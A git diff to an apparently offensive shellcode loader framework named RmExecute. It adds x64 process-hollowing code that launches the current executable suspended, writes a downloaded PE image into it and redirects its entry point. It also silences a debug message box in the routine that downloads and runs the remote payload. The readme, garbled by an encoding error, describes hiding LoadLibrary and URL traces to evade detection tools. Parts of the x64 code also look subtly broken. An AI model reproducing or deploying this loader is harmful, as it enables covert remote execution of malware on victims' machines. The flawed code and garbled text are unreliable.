diff --git a/RmExecute/123.bin b/RmExecute/123.bin
new file mode 100644
index 0000000..b64eced
Binary files /dev/null and b/RmExecute/123.bin differ
diff --git a/RmExecute/Loader.cpp b/RmExecute/Loader.cpp
index 6820815..5b2b99d 100644
--- a/RmExecute/Loader.cpp
+++ b/RmExecute/Loader.cpp
@@ -117,6 +117,7 @@ int _tmain(int argc, _TCHAR* argv[])
int _tmain(int argc, _TCHAR* argv[])
{
+
#endif
diff --git a/RmExecute/RmExecute.vcxproj b/RmExecute/RmExecute.vcxproj
index 07df817..feabde1 100644
--- a/RmExecute/RmExecute.vcxproj
+++ b/RmExecute/RmExecute.vcxproj
@@ -159,6 +159,11 @@
user32.lib;winhttp.lib;msvcrt.lib;
+
+
+ _DEBUG
+
+
diff --git a/RmExecute/ShellCode.cpp b/RmExecute/ShellCode.cpp
index 6742eb2..d1a5f84 100644
--- a/RmExecute/ShellCode.cpp
+++ b/RmExecute/ShellCode.cpp
@@ -1,10 +1,15 @@
#include "ShellCode.h"
//加载起始函数,跳转到入口函数
+#ifdef _WIN64
+VOID mmLoaderSCStart(){
+ Strat();
+#else
VOID _declspec(naked) mmLoaderSCStart()
{
-
+
__asm jmp Strat;
+#endif
}
@@ -49,7 +54,7 @@ public:
//提取项目的main文件,StartSCode相当于项目的main函数
- void __stdcall StartSCode(char * URL)
+ void __stdcall StartSCode()
{
@@ -62,7 +67,7 @@ public:
int size = HttpDownload(host, path, 443, TRUE);
- fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
+ //fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
RunPortableExecutable();
@@ -75,15 +80,21 @@ public:
};
//sehllcode入口函数
-void __stdcall Strat(char * URL)
+void __stdcall Strat()
{
//由于需要模拟全局变量,所以使用类包裹下
RmExecute runclass;
- runclass.StartSCode(URL);
+ runclass.StartSCode();
}
-
+#ifdef _WIN64
+void mmLoaderSCEnd()
+{
+
+#else
void __declspec(naked) mmLoaderSCEnd()
{
+
__asm int 3;
+#endif
}
\ No newline at end of file
diff --git a/RmExecute/ShellCode.h b/RmExecute/ShellCode.h
index 88e841e..a0e4121 100644
--- a/RmExecute/ShellCode.h
+++ b/RmExecute/ShellCode.h
@@ -9,7 +9,7 @@
EXTERN_C VOID
mmLoaderSCStart();//这里用来表明shellcode的开始
-void __stdcall Strat(char * URL);//入口函数main
+void __stdcall Strat();//入口函数main
EXTERN_C VOID
mmLoaderSCEnd();//与开头对应的结尾
\ No newline at end of file
diff --git a/RmExecute/Tool.h b/RmExecute/Tool.h
index 440a874..f3696ae 100644
--- a/RmExecute/Tool.h
+++ b/RmExecute/Tool.h
@@ -311,7 +311,73 @@ int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,B
return dwLast;
}
+#ifdef _WIN64
+bool RmExecute::RunPortableExecutable() {
+ IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
+ IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
+ IMAGE_SECTION_HEADER* SectionHeader;
+ PROCESS_INFORMATION PI;
+ STARTUPINFOA SI;
+
+ CONTEXT* CTX;
+
+ ULONG_PTR* ImageBase; //Base address of the image
+ void* pImageBase; // Pointer to the image base
+
+ int count;
+ char CurrentFilePath[1024];
+
+ DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
+ NtHeader = PIMAGE_NT_HEADERS(ULONG_PTR(newbuff) + DOSHeader->e_lfanew); // Initialize
+
+ GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
+
+ if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
+ {
+ ZeroMemory(&PI, sizeof(PI)); // Null the memory
+ ZeroMemory(&SI, sizeof(SI)); // Null the memory
+
+ if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
+ CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
+ //process in suspended state, for the new image.
+ {
+ // Allocate memory for the context.
+ CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
+ CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
+
+ if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
+ {
+ // Read instructions
+ ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rbx + 8), LPVOID(&ImageBase), 4, 0);
+
+ pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
+ NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
+
+ // Write the image to the process
+ WriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
+
+ for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
+ {
+ SectionHeader = PIMAGE_SECTION_HEADER(ULONG_PTR(newbuff) + DOSHeader->e_lfanew + 248 + (ULONG_PTR)(count * 40));
+
+ WriteProcessMemory(PI.hProcess, LPVOID(ULONG_PTR(pImageBase) + SectionHeader->VirtualAddress),
+ LPVOID(ULONG_PTR(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
+ }
+ WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rbx + 8),
+ LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
+
+ // Move address of entry point to the rax register
+ CTX->Rax = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
+ SetThreadContext(PI.hThread, LPCONTEXT(CTX));
+ ResumeThread(PI.hThread);
+
+ return 0;
+ }
+ }
+ }
+}
+#else
bool RmExecute::RunPortableExecutable()
{
@@ -379,3 +445,4 @@ bool RmExecute::RunPortableExecutable()
}
return false;
}
+#endif
\ No newline at end of file
diff --git a/readme.md b/readme.md
index 4d615f6..793bc3a 100644
--- a/readme.md
+++ b/readme.md
@@ -2,7 +2,7 @@
Remote Download and Memory Execute for shellcode framework
-杩滅▼涓嬭浇骞跺唴瀛樺姞杞界殑ShellCode妗嗘灦锛屾殏涓嶆敮鎸乆64
+杩滅▼涓嬭浇骞跺唴瀛樺姞杞界殑ShellCode妗嗘灦锛屽凡缁忔敮鎸亁64
# 鍙傦紙鎶勶級鑰冿紙琚級椤圭洰
@@ -63,10 +63,6 @@ pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);
闅愯棌loadlibrary鐗瑰緛鍜寀rl鐗瑰緛锛屾洿涓嶅鏄撹鍙戠幇
-## X64鏀寔
-
-鑷璋冭瘯`Tool.h->RunPortableExecutable`鍑芥暟锛屽ぇ姒傚氨鏄姞涓猉64瀹忔妸EAX浠涔堟崲鎴怰AX(搴旇
-
## 鍙嶅皠DLL鍔犺浇鎶鏈
瀹屽叏涓嶄娇鐢↙oadLibrary锛孭rocessExplorer銆乸rocexp64绛夊伐鍏锋棤娉曟娴嬪埌杩欎釜dll锛屽悓鏃惰绋嬪簭鍙樺緱妯″潡鍖